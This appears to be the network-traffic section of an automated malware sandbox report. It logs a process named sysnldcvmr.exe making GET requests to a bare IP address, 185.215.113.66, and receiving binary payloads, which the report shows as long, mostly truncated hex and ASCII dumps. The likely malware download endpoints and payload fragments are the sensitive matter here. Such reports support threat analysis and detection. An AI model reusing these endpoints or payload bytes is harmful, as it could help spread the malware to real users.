                                                                                                                                                                                                                                                  Data Ascii: $8)w"KvW`Ri[#80Gc)5E 5twr$7b'\{Zuw|1r $K/.v$$3xj7GI8wA>$6NFjh2m[=k08a}H E"5G[
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:37.820290089 CET1236INData Raw: 89 11 90 f0 30 5d 06 79 7d 11 91 53 a2 46 2a 99 af 89 be 89 c8 83 47 2f 5e ef 6a 87 f1 7c 3a df a2 02 bb a3 df d2 1f 3a 08 9d e6 63 5d dd e3 c8 b4 1a ad 2a 53 c5 97 64 d5 9b b7 66 cc 4b 9e c7 1a 33 07 e8 ac 25 da a7 84 91 1d 25 bd de 9a e6 f7 1a
                                                                                                                                                                                                                                                  Data Ascii: 0]y}SF*G/^j|::c]*SdfK3%%4vriY^~4w/'`3Wx0b/".4*AM0IjS#O'1V##+.jtts*sp4F9a0{W{+mF9_X#9`<`811
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:37.820302010 CET1236INData Raw: 1d be e3 38 fe 87 7e b5 6d 58 aa 5c 13 e6 a5 b7 77 a5 c8 43 39 e2 87 3a 9a d6 88 bd c1 a8 f5 24 83 23 a6 89 0d de 27 33 d7 55 67 b0 a9 0e 84 95 1d 85 2c 1d e0 b5 27 93 cb 6e db b1 78 8b c2 05 c1 16 93 b6 0f 53 d9 20 e5 88 aa c2 25 c4 f3 16 d3 1d
                                                                                                                                                                                                                                                  Data Ascii: 8~mX\wC9:$#'3Ug,'nxS %kU0]P>/DO\)#B+w~GkumhhFFjx6>`bz+Gb_k:EeWSIF+n8l-"kz.To()>H<#DIj$W:J/eU\ep
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:37.820316076 CET1236INData Raw: 2f d2 b0 3f e0 39 9a 07 57 31 bc fd 0e 71 99 76 58 86 49 b0 90 52 15 84 2c 37 30 4e 73 a1 ca 93 3d 29 c7 b9 aa 3f 97 61 0f a3 a5 e1 dc 06 ec 8d 7f 52 6d 54 b5 79 ff eb 4b 04 ec 05 bd cd 2c 34 02 21 8b 77 e6 70 c0 d6 2f be 36 de 14 26 aa db 2a b7
                                                                                                                                                                                                                                                  Data Ascii: /?9W1qvXIR,70Ns=)?aRmTyK,4!wp/6&*_C2kYO~6~hcah\(W"hY$4C$fjz0nqh:~rfrN1Vx1qn>5T M .A'=+<
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:37.820327997 CET1236INData Raw: f5 33 7e 51 d0 1d 0a cc 3f c9 2e 84 8f 1f 47 7d e2 6d e2 1a 0f f8 27 13 14 59 b3 46 45 33 ef f4 67 df eb e0 59 ff 29 b1 ea 12 c8 d9 b4 d1 af e6 9a fb a4 ba 80 a7 30 c6 d1 c0 f6 10 d3 09 45 64 60 be e2 7c cb 6d ea 76 2f 1b 4e e8 b1 98 dc 7f 2e b1
                                                                                                                                                                                                                                                  Data Ascii: 3~Q?.G}m'YFE3gY)0Ed`|mv/N.bT3>r_qaE~=1u,Ok['HJyp[+"22?!s8:8Lb|BQEdqN96>7:WtKtrXl2CDFcu~ZZqrD-#l}E&Q
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:37.820346117 CET1236INData Raw: 37 36 14 ef 30 ee f8 f2 f4 b1 32 98 51 9c 01 31 ae e5 14 0d d7 4f dc 08 c1 ff d0 f6 0c b9 ba 36 ce 8c 81 ed ae 51 2e 2d dd 11 21 52 a2 c6 ae 9a 19 04 42 88 fd f9 34 22 97 f2 66 93 e9 57 03 52 d5 56 9d b9 33 43 49 36 e9 35 df e2 f0 f5 c6 9b b5 78
                                                                                                                                                                                                                                                  Data Ascii: 7602Q1O6Q.-!RB4"fWRV3CI65x`3$Tg^:F=nlX,#~4?^./1OV&}S5x8>mw{iQr8!XUfG.p2"3PoG%X@3|_M|7
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:37.820437908 CET1084INData Raw: a1 b8 9f 70 1c 5d fe b5 63 05 d9 e3 9e 0a 70 75 96 29 ca 74 3f 47 c4 81 7b cc 49 84 43 5b 22 a2 dc a7 19 ec 61 42 56 7b ff 00 f6 14 20 8a 2f 5f 3a 16 3c 31 d7 28 ed 54 0b 51 86 aa 86 cd e8 ed fc 6d e5 7a 49 6d ea 08 1b 64 3d 18 4a e1 ea 9d 7a d7
                                                                                                                                                                                                                                                  Data Ascii: p]cpu)t?G{IC["aBV{ /_:<1(TQmzImd=JzqaZ=$HFoDvXdel+byyGn]I&/cz$(t\mLy-fuwH(F(/RGT[`'N=;J-JI./x/


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  54192.168.2.1150080185.215.113.66807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:41.352830887 CET166OUTGET /2 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:41.796610117 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:35:41 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 10496
                                                                                                                                                                                                                                                  Last-Modified: Sun, 20 Oct 2024 18:34:00 GMT
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  ETag: "67154d18-2900"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Data Raw: 13 e3 aa 7c f1 40 76 43 29 84 09 02 71 ae 39 fc df 9d fa 02 4b d8 7b 3e ae 0c e2 64 38 f9 d3 27 da 73 10 d1 ca f9 f2 4a f8 ad aa 12 e8 fa c9 50 6e f5 a1 6b 88 56 c2 7a 1f 17 e8 40 57 00 b2 8f df 4c 7b e3 14 75 47 bf 27 47 31 bb 43 4c 8e e7 b4 40 14 db 1d 3c 42 cc e1 36 dc d3 3b 91 3e 68 4d 15 e2 5c e6 98 da 7c 77 03 42 8c 76 ca a5 9a 81 db a1 ec 75 f2 84 a2 67 09 f0 c5 b4 4f 58 86 25 fc 20 b3 68 fa 72 39 3a 7c e0 1b f5 e8 b0 73 b6 f8 3c 81 36 fa 29 81 67 e8 ee 34 47 6c 59 b9 7f 18 32 42 66 14 35 b3 8d e2 41 8d e5 92 2b 47 1f c0 93 b3 28 d8 54 2d 6f 45 f1 c3 5a cf 49 32 33 d3 7b ac a8 27 33 c1 c9 e0 29 60 f9 b3 d3 5e 65 37 6a 7a 2f 4d 24 73 1b 93 bb fa 91 d2 34 ce 9b 19 db d6 2a 31 36 f0 a2 ab 92 6d 08 d9 66 72 6e 07 c5 44 44 2c 9e af ae ce d3 fb 57 61 28 cd 32 90 44 0e c3 39 95 a9 ab 17 e4 0d 16 a5 f0 c2 e3 78 c3 de e1 fa ff 86 d7 ae ab 06 ba 5a 6b 34 44 61 15 d3 b1 85 29 3f 83 f4 5f 68 10 ed 8d d7 73 41 11 b6 57 f3 ed 02 fa a4 42 32 ff 99 d6 ea 0a 63 48 51 ba 54 b5 00 01 83 3d 9e bb 55 dd 93 1c e5 [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: |@vC)q9K{>d8'sJPnkVz@WL{uG'G1CL@<B6;>hM\|wBvugOX% hr9:|s<6)g4GlY2Bf5A+G(T-oEZI23{'3)`^e7jz/M$s4*16mfrnDD,Wa(2D9xZk4Da)?_hsAWB2cHQT=U@3}!YGCX{ 4"&h0.'xu#c|gL0)cM]oL{:En:?|_XPQ@ 3.o)ua[I+fZM% ]2uz_Gwt0bFaMTd2Y&TMXP}+OpQEo6R;P>8`2'"~CZ_,2g $l"x:h;H`$-6_-eC?6T=qL3&fG)WG@6X~%X%RCh?R].fbU!PHh"Rj,dk.e\~hn(,G<u16tlw;p;yrSC_M6XhtG7zsHP,e_ddcn^M+ct\0jr>;_nq>xezw
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:41.796643019 CET1236INData Raw: b6 6f 0a 0a 83 25 6b 6b 77 fa e4 46 67 eb d9 41 2f aa 63 53 82 83 51 d9 2f 3d 63 6a 82 33 0b 6f 95 13 e1 9f 36 1b ba cb fb f5 6f 57 bb 40 bd 1d a5 c1 57 98 12 18 b1 98 2c ff 21 39 d5 d8 8c 8b 48 74 d5 8a 79 fc c5 75 bb aa e4 d3 c1 a0 97 29 d7 96
                                                                                                                                                                                                                                                  Data Ascii: o%kkwFgA/cSQ/=cj3o6oW@W,!9Htyu)PU:vO'8O>*B aw'&iEpRaMZ|3Fk<lQ;GbPMlh5}8m;ajW,N7&QK
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:41.796653986 CET448INData Raw: 63 34 74 b5 c2 9f e6 cf 24 40 6d 6d 39 94 34 21 a1 59 32 49 93 8d 45 6f 16 41 e3 3e fb e9 ec 01 f9 89 40 75 7d 84 c1 29 99 2e 8f f9 01 1b d7 e2 f5 ea f5 37 7e 95 c0 87 7f d4 e2 e3 b8 2c a3 95 7b 43 15 a1 69 fe 92 c8 13 e2 7f 5f 3b 68 4b fa 25 e1
                                                                                                                                                                                                                                                  Data Ascii: c4t$@mm94!Y2IEoA>@u}).7~,{Ci_;hK%D&kuY'p=/a:NTtKu"1X[8Ibdym-*|+>a`<Z!%| 4&[+usL^etpuu);Xb<>M\
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:41.796698093 CET1236INData Raw: 92 9e 26 b6 ba 24 d3 e9 5f 78 f0 46 b3 fb ec 4c 7a fc a1 5d c7 8a ec a6 42 ab 44 84 03 f9 81 96 36 fd ed c9 4f b3 81 fd e7 81 ea ce 79 f9 f3 a1 ca f0 5b a2 b8 c3 90 5f dc ed 5c 34 78 50 13 39 f3 bb 90 90 b0 6f 27 d8 e3 d7 65 e4 8e 4a 16 09 e5 54
                                                                                                                                                                                                                                                  Data Ascii: &$_xFLz]BD6Oy[_\4xP9o'eJTwA!Zv MmvgOtWG/C>&2P=e:5eorUle"Kk,/ew\3;_,79:-jS`kKc\`x CCTOK=HC>7
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:41.796710014 CET1236INData Raw: 89 64 03 c4 b2 ec b9 97 d5 83 e8 57 97 b5 96 6d 6c e1 10 45 ab 13 bf f2 29 06 4d f4 06 88 06 a2 74 39 19 fe c6 d5 fa 1d 8e f0 ac a5 47 e5 a1 f1 32 3f ef 3d 4c 92 e5 2a e9 b5 ff 7b 50 a1 ad ea b8 71 20 43 54 20 64 73 86 90 f8 e1 cf 48 c1 80 bc e3
                                                                                                                                                                                                                                                  Data Ascii: dWmlE)Mt9G2?=L*{Pq CT dsHHw+~1uDu,;xuv&eaAwm])pQ`HvnoSu;B9MP39L!Y:U|M- R1'1g?g
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:41.796724081 CET1236INData Raw: aa fa 62 12 93 06 96 26 10 ad ee 3f 3a 32 0f 63 b0 c9 34 e0 c6 5d 26 60 69 44 af c5 91 85 d2 84 09 89 f2 6c 3d 84 bc 18 7a 15 34 45 a4 64 67 41 97 93 05 44 ff df 37 26 13 b8 c0 69 cd d0 4d e7 a8 07 3a c0 b4 91 f1 c8 d0 9a 5f ec 8d 18 a9 e0 47 12
                                                                                                                                                                                                                                                  Data Ascii: b&?:2c4]&`iDl=z4EdgAD7&iM:_GHkd*UDfMvJ_;Pk9njT:S;7#B0;s9MxF!o-0.Iq&q"Ka4tO>]=7PpVra;AyN<.O~`=]/
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:41.796736002 CET1236INData Raw: 55 fa f6 a6 80 b6 6c 83 d2 ea 2f d6 f9 a2 96 d2 ee 32 1d 3a 03 4f 21 69 97 4b 76 be d4 fd 5e 94 dc b6 91 f9 89 7f 6c da 9f c8 b4 c1 a7 bb 31 3d 07 3e 88 72 f1 4a fa 21 3b fb e2 1e 9e 3d 7f 77 4a 6f 8a 09 14 20 4f f5 68 09 fe f2 df 7a 11 bb 4f 3d
                                                                                                                                                                                                                                                  Data Ascii: Ul/2:O!iKv^l1=>rJ!;=wJo OhzO=q~qF.Bth]QL>uAZ Zva"HIbKdPSmy"Y9o3QBqYV#Vr8C7ClU8.* /;7(^
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:41.796967030 CET1236INData Raw: e3 8d 21 bb 4e dc cd 1a 6c ff 09 f1 d9 48 e3 7c af 33 cf be 1b 12 df 57 72 de 12 b5 be b0 1f a7 be 3a f9 9e ce 06 d1 45 e2 08 a7 d4 27 85 c9 b9 72 d1 c2 ba 68 f3 74 f6 c7 76 f4 e9 47 ea d4 1f d2 e2 2e 77 47 36 12 b0 6e 3d 2d c0 7a 09 e7 50 4b 2c
                                                                                                                                                                                                                                                  Data Ascii: !NlH|3Wr:E'rhtvG.wG6n=-zPK,,jhMRD Yi=8S7=3R]TwZW9^hx``\vkU&lJuGoexF*-~Q;Y0oqb=gP/
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:41.796978951 CET1236INData Raw: 6d f2 73 85 6a 12 77 5c 9c 23 69 0c 30 2b 83 58 15 a7 0a 78 8b d9 e7 3c ae 29 59 e8 ea 2f 27 38 7d e8 bb 4d 38 96 ba 51 f9 ba 97 69 65 26 64 09 72 dc ea 15 d0 f3 9f dc 20 ab d3 42 81 d3 e8 76 59 6e 48 e8 85 96 02 c2 32 90 15 58 76 d7 70 d4 04 7c
                                                                                                                                                                                                                                                  Data Ascii: msjw\#i0+Xx<)Y/'8}M8Qie&dr BvYnH2Xvp|hMDGRnV - mS&9TMhZN<^'l}I4n/(U*SQ0EGuKMMv^+ QYI_UyC8v#"=<dYz %.:
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:41.796992064 CET425INData Raw: 2b 8a 4c 0c ab 7f f0 c9 c5 94 f0 f3 80 3c ef ed 6b d8 9f 62 a8 03 27 e0 17 47 67 28 76 ac c8 d7 10 f0 b9 a3 f7 71 ce 49 93 4a 84 9c b0 8f ce 95 f4 29 88 c3 fe cf 80 c4 bc 4c 70 ad 6a 6c 7c 6f be e7 dc 2b 1c 0f 02 6e 4a 1f 45 95 24 7e 38 17 1d ca
                                                                                                                                                                                                                                                  Data Ascii: +L<kb'Gg(vqIJ)Lpjl|o+nJE$~8)XrJ]|a<YaZ#A||fsmK?|-s;Q|fGfAJPzKPKkg~3}lScv?Rje%t|WYFuy3cs{^


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  55192.168.2.1150082185.215.113.66807744C:\Windows\sysnldcvmr.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:44.041318893 CET166OUTGET /3 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:45.372827053 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:35:45 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 55040
                                                                                                                                                                                                                                                  Last-Modified: Sat, 30 Nov 2024 15:55:38 GMT
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  ETag: "674b357a-d700"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Data Raw: 71 55 bf 68 00 78 5e 05 bf 77 f1 ce 6a 84 34 af 59 54 f4 9a 7f 2e 9e 56 5c 9f 90 cf 88 27 49 60 23 c8 18 58 ef 00 f5 4c be 7d 1c 91 c4 34 02 a2 5c 3c 0d 4e 55 81 f8 05 ac ee cb 01 3b 46 d2 9c 58 e4 0f 57 22 b2 cd 6b b7 cc 33 3f be b9 da e2 c1 f2 64 fc e6 50 f4 9a 92 a5 f5 09 a8 09 a7 c7 da 31 7d 87 96 31 55 a4 1a d0 ba a1 26 ba b8 99 69 1d 33 dc 14 0f 1c 89 01 e6 63 3c 95 aa 53 61 58 04 03 e1 40 77 fb 5f 23 b2 e6 ef 48 bb 0d da b9 71 4f 5c 1b bf 2d 19 31 22 20 7c 90 25 4c a9 42 7c 7d b5 72 c6 73 d7 e6 e2 bc c8 de e2 46 c0 f0 c7 86 98 ef 5b b4 36 d4 af 0f dd d9 cf 96 3a ae 7e 9f c1 2c 54 45 11 30 e9 3e f6 a0 0c 58 a7 ed 3c 7a d4 d4 8e 7e fd 5d 2c a2 dc 17 0f 69 98 fe 29 2d 23 fc 4f a1 61 fb e3 d4 f3 0f 4b b1 33 49 91 45 9f 62 e1 a2 13 f5 5c 5d 8f c4 f6 8b c7 30 c5 0b 16 f6 6f f6 71 a2 69 a7 be c7 a0 ad 0c 22 4b 33 e3 10 dd f4 ad 9d c9 f9 ba 6b 9d 18 b7 b7 99 bf f8 3e bf 51 8f e7 79 e1 e2 02 f7 6b a1 21 e1 93 c9 31 90 95 64 be 3c 55 a3 bc b1 6e 93 47 c8 b4 34 76 3f 40 1c 6f b5 f6 6f e2 0a a6 f3 70 3f [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: qUhx^wj4YT.V\'I`#XL}4\<NU;FXW"k3?dP1}1U&i3c<SaX@w_#HqO\-1" |%LB|}rsF[6:~,TE0>X<z~],i)-#OaK3IEb\]0oqi"K3k>Qyk!1d<UnG4v?@oop?t Q@>VeGy6-:p~w!:zq<|TwX?Fq)3Pr|\jFC4wa|zk9eT*G$IFxP!+*(Wjv2G6;axnMd<?IA0![eLQ'Ju$%6b$V"2yvRKbPUH!@uQ+Zp,j%nf]k1'+|~z0g[:e2?zO*_X8IhveZ9:iOSgly{`bx6R-bHWhgF[oDzz68lty<}Du56T;,{stYZL1"!hJy^cqVNWAy<I7fo-)m/$f55KqQ*chAZM,v@O$j ^t)%BlCWv[ZBO8:L=-
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:45.372853994 CET1236INData Raw: 5b 45 cd 42 00 1c 84 28 01 50 de 3b 22 91 56 cf e9 a7 2b 5b f3 ba d0 65 3e d9 cc 07 bf 4f ee 6c a9 19 5b ee bb 28 49 cc e1 f2 28 87 3c e0 d7 ff a4 0a 34 6f 49 d4 2a 8b a8 f8 bc 1a 35 e9 59 59 81 c3 15 fd 6e cb be 09 bb e1 99 dc e7 12 87 9c 23 b5
                                                                                                                                                                                                                                                  Data Ascii: [EB(P;"V+[e>Ol[(I(<4oI*5YYn#XGqenlH=F<S["z{{"lEU7e.6Due0hPD _Bt;%*H_bC@97U8,/&U5Ck]ocRO3hW|
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:45.372868061 CET448INData Raw: 21 40 2e 7a e6 15 b0 99 e8 de ee 46 43 de 03 52 a6 24 16 2a b3 5d d1 a1 7f a1 78 24 78 cf 01 39 d9 7c 1d f8 bc 81 03 92 ba 67 09 de e8 5d f4 fa 51 0c a3 36 e6 93 c9 a6 8d b5 2b 22 59 9a f8 e5 f7 e7 93 69 b0 54 20 09 4a 3a 9e ac 16 cc 15 f9 31 da
                                                                                                                                                                                                                                                  Data Ascii: !@.zFCR$*]x$x9|g]Q6+"YiT J:1kYK`coIIe=v)~::N({6I\&6/CBAI_j"s\cUzh{$#F?@yF(~YkV.3T#|;d!q?+y<pt
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:45.372883081 CET1236INData Raw: ec ab f3 28 62 b1 ff d2 33 a3 bb 28 d4 9e 06 03 34 71 c3 2b 05 76 4c 64 5b 46 ef 31 a0 f3 92 9e b9 f1 ff cb 17 a0 52 11 c2 df 6d da da ea 8a 74 01 be 90 aa ff 57 e5 34 59 98 94 b6 2d 97 67 51 1d bc 47 e8 a7 a3 08 0b cd 05 aa 63 b9 20 a3 b2 9d d6
                                                                                                                                                                                                                                                  Data Ascii: (b3(4q+vLd[F1RmtW4Y-gQGc % RdRB`OB{&SJNvvO{0%i01\Ap;NyJ6"8b!{SHcC/A#jd9XU`D5,#]gqPKa0
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:45.372895956 CET1236INData Raw: 22 65 10 8a 26 7e 2c ef 72 37 db d1 97 08 9b ff f9 0c 65 f9 b6 3e 11 b0 6c a6 3d e4 e4 55 f2 93 2d c8 ae 76 22 e6 48 b6 ff 8c 50 43 1a bf 7c ec e4 29 32 37 e9 7f 07 67 b6 d3 ed 4a 5f bc 04 14 8a 6e ea b9 01 ef 11 73 5a f2 e3 27 0e a1 f4 ed 3c b5
                                                                                                                                                                                                                                                  Data Ascii: "e&~,r7e>l=U-v"HPC|)27gJ_nsZ'<!.xRt8HIDE1@P[lZ/\!A"7$yU?&,qEkax?lsWe'JR#uQQ2R2$Dm n/q
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:45.372991085 CET1236INData Raw: 31 42 c0 08 0f e1 31 33 2a f5 92 0b 38 a0 18 e6 1a 3a da 58 04 8b fa fe 8e cd c5 00 35 50 c7 ab 79 be 61 52 62 3b ca d6 36 43 58 16 8f 8d cd 58 2d 85 10 02 d8 d6 ce c3 1b ad d5 f5 2b 19 e0 58 30 dc 7b 83 ad 8b c5 83 ed a5 72 fa cb e4 8b 37 8a 5e
                                                                                                                                                                                                                                                  Data Ascii: 1B13*8:X5PyaRb;6CXX-+X0{r7^M(:{w9Oz6k`m"q2T;auZOn.i^y_Zi{M@V`IIuBWm#x`n)Ch2)^W
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:45.373006105 CET1236INData Raw: d1 2f ec 3d 2b 2c 39 f8 44 7e 47 fd dd 4e 07 96 9e 52 d5 fc 34 ac 3a be ae f3 a8 6d d6 7b d1 eb cf bc 65 31 16 da b0 d7 33 c5 07 a4 8e e3 50 8b db 1d 4f da d7 74 e0 c7 7f 30 f8 fa 3a 96 3c 92 81 dc 45 cb b3 33 20 99 cf 2d af da 0b d9 9c ea 98 7a
                                                                                                                                                                                                                                                  Data Ascii: /=+,9D~GNR4:m{e13POt0:<E3 -zPqh_{,@K7IHJ<o:]v(-d*CZ`p7(uiHd=)d3@<6C(N$?`Go{V$7Z5eI+6}fB*w4G0oAG#of
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:45.373019934 CET1236INData Raw: 5c 26 7b 36 f8 5a 45 a5 9d d7 df 7d 5d d3 b6 e6 8c 11 59 83 02 aa 7f f7 ab 60 c6 dc 78 5d 86 34 9f 79 73 73 98 ff a0 ff 69 7e 03 ba fe 76 4c 1e a4 c4 3d 30 5b df 08 bb b6 20 2c 1b cd 12 23 1f f2 89 33 6f 70 00 6c 13 d7 19 f2 d8 9a e9 fc 47 63 5c
                                                                                                                                                                                                                                                  Data Ascii: \&{6ZE}]Y`x]4yssi~vL=0[ ,#3oplGc\Z&Fvu\Nbk>Ly?dpbkVV* M:[+#P%rJ^Bmd|ZQg:*F!ExyZyl6F(gO%Fn_\0R_J6G
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:45.373193979 CET1236INData Raw: 0d 23 d9 fe 1e 77 dd a8 c8 52 8a 6c b4 d8 a0 17 35 40 e3 cf bb 03 14 da 58 ee a2 29 3e 03 8a 26 21 03 b9 4d 50 f6 a5 e5 38 5d 15 55 9a 37 76 51 47 01 44 af 6a aa fc 9b 6e 67 a0 2d 21 3b dd 56 7d f1 3c 75 54 69 e0 c2 7a a0 e8 96 72 a9 7d 2c 87 2e
                                                                                                                                                                                                                                                  Data Ascii: #wRl5@X)>&!MP8]U7vQGDjng-!;V}<uTizr},.WG8L B4sK7iuV^\\}]=hTC^QR#/"$eh(niyMznXZS+c.+ux7=&RMPUK
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:45.373207092 CET1236INData Raw: 8f 33 8d 8f b6 0d e7 37 63 02 e6 f4 c8 c9 55 fc 91 8f 31 b7 73 50 31 6b 2a 61 de a0 52 2e 26 85 47 3d 9e 9d 79 e0 a6 aa e9 d1 97 82 18 ba 84 10 d8 23 af e4 36 84 ef b1 aa 67 1e b1 e3 33 4e af 41 23 bc b8 c8 6b b3 fc db ae 38 bd bd f9 af b0 60 db
                                                                                                                                                                                                                                                  Data Ascii: 37cU1sP1k*aR.&G=y#6g3NA#k8`&Mb_@GjY]2*4mJ$Oya:8s%uoI@Q`2|+l'K~OvU5s25"rcvh2UW!m%@xfle]rCCN,G{
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:45.497033119 CET1236INData Raw: 40 71 7b 47 4f 10 f3 15 4a ec 55 93 79 9d 31 cc 02 b3 be f9 5a 3d 83 74 c2 3e 73 2e df b2 70 92 4b a3 1d 39 fd 92 38 f6 be c6 df 1c af 36 f5 c3 42 fc 33 b5 be d6 e9 52 54 9b f1 b7 2a 9c 48 a6 4b 49 f3 61 72 da d8 28 e6 01 68 58 eb 7b 85 37 60 37
                                                                                                                                                                                                                                                  Data Ascii: @q{GOJUy1Z=t>s.pK986B3RT*HKIar(hX{7`7.ch2$B,eCb4|x:BnR`Vl6gYDllWeU0nBorR#B\J6[%nODmwti+Hixi@h7))X8`xY{K^


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                  56192.168.2.1150084185.215.113.6680
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:47.536969900 CET166OUTGET /4 HTTP/1.1
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Host: 185.215.113.66
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:48.870861053 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                  Date: Thu, 05 Dec 2024 16:35:48 GMT
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  Content-Length: 63232
                                                                                                                                                                                                                                                  Last-Modified: Fri, 29 Nov 2024 08:44:56 GMT
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  ETag: "67497f08-f700"
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Data Raw: 33 f7 8b 96 d4 1c c5 f7 02 2d 3b f9 29 56 f5 f4 d6 d1 ab 1d a3 07 e3 94 06 db 98 58 8f a8 15 fd 7f 2a 5c a2 5a 7f 5e 53 dd 1e fd e9 2c 6e ac ad 71 ea 1a b3 2e 68 a2 20 49 ea a8 e0 84 a0 ef a9 83 65 db 9d c7 bf e1 92 3b 5a 7a b1 38 27 e1 0e b1 ad 9d 34 46 80 b2 41 72 1e b0 61 3d 58 04 36 4f 34 af 33 66 98 c3 62 e4 2d ff 5c 75 75 f3 20 e7 79 37 9b 19 b5 17 a2 ce 84 0a ad d0 c6 8c 15 30 70 5c 6b c4 92 aa 2c 95 d8 e3 b8 4e 58 6e 38 a5 ae f3 d7 30 b0 d0 18 34 65 f2 a6 49 88 07 9f 4f f7 44 af 44 64 61 ed de 19 46 71 f9 82 32 a3 5f 55 4f 88 b3 af c3 b3 37 c2 77 a2 6b 03 99 84 a0 97 c7 fa 4e 6c 85 2e d1 c9 a0 c9 63 48 9a bc 6b 3d 82 6b 52 64 94 fb 2d 30 37 3c af 78 bb d8 61 5c a1 84 19 88 fb e8 59 e6 d1 32 4a 01 8b ed 59 ef 69 92 b3 3f f8 1c ef 81 73 9a c2 56 62 00 68 5c ee ab 06 14 2f 08 27 10 3d f9 3b 0f 17 a5 5f 99 05 c8 b2 9b 39 e6 7f 4d c9 53 2a b9 8d 3b d9 b9 66 cd d5 f0 d9 d8 1f a6 78 8f 3b 7b 6c c2 42 40 2c b3 8b 4c e3 46 03 3f a4 77 00 31 00 62 2e 43 56 7d d7 90 dd c5 c5 37 b1 d9 e9 3d 04 fc 73 2f [TRUNCATED]
                                                                                                                                                                                                                                                  Data Ascii: 3-;)VX*\Z^S,nq.h Ie;Zz8'4FAra=X6O43fb-\uu y70p\k,NXn804eIODDdaFq2_UO7wkNl.cHk=kRd-07<xa\Y2JYi?sVbh\/'=;_9MS*;fx;{lB@,LF?w1b.CV}7=s/pQ[Gm+P3]1Y[)e=t|*wOQ;}GF:m k'h:rgrM$wygS^`3s^Ye2554KJL!.j^R4o6g?{x}iX1?rW-m4v&n%l:_yNauT}T!V9DKLM9#,f\c^870(7AVB4sy.mE$IRHF'!,a's\$qHV[*9RSrzKI74HyNtnC wY8Ih6;>EDbyEWIchP&="1".'R;a_-Uy/24(suQyGO8`)u3g9lW2(P>2^'r{g_!0i-(bgT?JfilC2`-N=TM[
                                                                                                                                                                                                                                                  Dec 5, 2024 17:35:48.870889902 CET124INData Raw: a9 e4 31 7f 61 96 d8 96 40 d0 9f 93 a5 20 8b 23 6f 3b cb 14 d6 52 f3 60 5f 88 a5 fd a6 7c 23 ca 95 7c 9b 98 8a dc 48 a2 ce 25 dd e3 81 30 53 09 1d 48 b4 39 7e ba 60 9d a5 86 b9 61 f6 17 af 61 2d e9 06 e3 ef ad 31 67 8c 1b 48 29 32 bf dc ac 73 0d
